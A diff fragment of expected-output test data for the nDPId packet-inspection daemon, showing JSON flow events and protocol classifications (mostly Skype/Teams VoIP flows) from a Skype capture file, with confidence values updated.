+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1276,21 +1279,21 @@ 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00583{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","packets-captured":2146,"packets-processed":2079,"total-skipped-flows":0,"total-l4-payload-len":359672,"total-not-detected-flows":45,"total-guessed-flows":22,"total-detected-flows":200,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":267,"total-idle-flows":267,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1293,"global_ts_msec":1431970708726} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
